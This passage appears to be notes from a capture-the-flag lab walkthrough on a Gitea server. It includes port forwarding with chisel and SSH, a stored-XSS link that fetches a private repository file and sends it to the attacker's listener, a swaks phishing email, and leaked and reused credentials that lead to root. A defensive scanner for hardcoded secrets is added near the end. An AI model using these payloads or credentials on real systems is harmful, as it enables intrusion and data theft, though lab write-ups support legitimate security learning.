udp 0 0 127.0.0.53:53 0.0.0.0:* -
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ Mails (limit 50)
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/mail/jobert
29987 96 -rw------- 1 root mail 93030 Feb 3 04:30 /var/mail/root
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/spool/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/spool/mail/jobert
29987 96 -rw------- 1 root mail 93030 Feb 3 04:30 /var/spool/mail/root
internal port 3000
./chisel server --reverse --port 1234
axel@cat:~$ ./chisel client 10.10.14.13:1234 R:3000:127.0.0.1:3000
/var/mail
axel@cat:/var/mail$ cat axel
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
Hi Axel,
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.
Gitea 1.22.0 - Stored XSS
- https://www.exploit-db.com/exploits/52077
- reset box
axel:aNdZwgC4tI9gnVXv_e3Q
ssh -L 3000:localhost:3000 -L 25:localhost:25 axel@10.10.11.53
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.13:4444/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">test</a>
- worked using another port
python3 -m http.server 4444
- have to send several times
swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link http://localhost:3000/axel/test" --body "http://localhost:3000/axel/test" --server localhost --port 25
python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.10.11.53 - - [04/Feb/2025 00:09:46] "GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1" 200 -
10.10.11.53 - - [04/Feb/2025 00:09:57] "GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1" 200 -
- using cyberchef to url-decode
10.10.11.53 - - [04/Feb/2025 00:09:57] "GET /?response=<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
header('WWW-Authenticate: Basic realm="Employee Management"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
header('Location: dashboard.php');
exit;
?>
HTTP/1.1" 200 -
creds
admin:IKw75eR0MR7CMIxhH0
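The raw index.php pulled out of Gitea carries the admin password as a string literal, and that same string is reused for root. The Python below is an added example, not the project's code: a small scanner for string literals assigned to password-like variables, of the kind run as a pre-commit or repository-wide check, exercised on a constructed copy of the file with a placeholder in place of the real secret.

```python
import re
from typing import Dict, List

# A quoted literal assigned to a variable whose name suggests a secret, e.g.
#   $valid_password = 'xyz';   or   api_key = "xyz"
HARDCODED_SECRET_RE = re.compile(
    r"""\$?(?P<name>[A-Za-z_]*(?:pass(?:word|wd)?|pwd|secret|token|api_?key)[A-Za-z_]*)"""
    r"""\s*=\s*(?P<q>['"])(?P<value>.*?)(?P=q)""",
    re.IGNORECASE,
)


def mask(value: str) -> str:
    """Keep two leading characters so a reviewer can match the finding without re-leaking it."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def find_hardcoded_secrets(filename: str, source: str) -> List[Dict[str, object]]:
    """Return one finding per literal secret assignment in the given source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in HARDCODED_SECRET_RE.finditer(line):
            if not m.group("value"):
                continue  # an empty literal is a placeholder, not a secret
            findings.append({"file": filename, "line": lineno,
                             "name": m.group("name"), "value_preview": mask(m.group("value"))})
    return findings


# Constructed copy of the file's shape; the secret is a placeholder. The last
# statement shows the remediated form, which the scanner must not flag.
SAMPLE_INDEX_PHP = """<?php
$valid_username = 'admin';
$valid_password = 'PLACEHOLDER_SECRET';
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}
$password = getenv('EMPLOYEE_ADMIN_PASSWORD');
?>
"""

if __name__ == "__main__":
    for f in find_hardcoded_secrets("index.php", SAMPLE_INDEX_PHP):
        print(f"{f['file']}:{f['line']}: literal assigned to {f['name']} ({f['value_preview']})")
```

Beyond moving the value into the environment or a secrets store, the finding here is a reuse problem: the web application's basic-auth password doubled as the root password, so any read access to the repository (here via a stored XSS in Gitea, but a misconfigured repository visibility would do) became a root compromise.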
axel@cat:~$ su root
Password:
root@cat:/home/axel# whoami
root
root.txt
root@cat:~# cat root.txt
d611b028...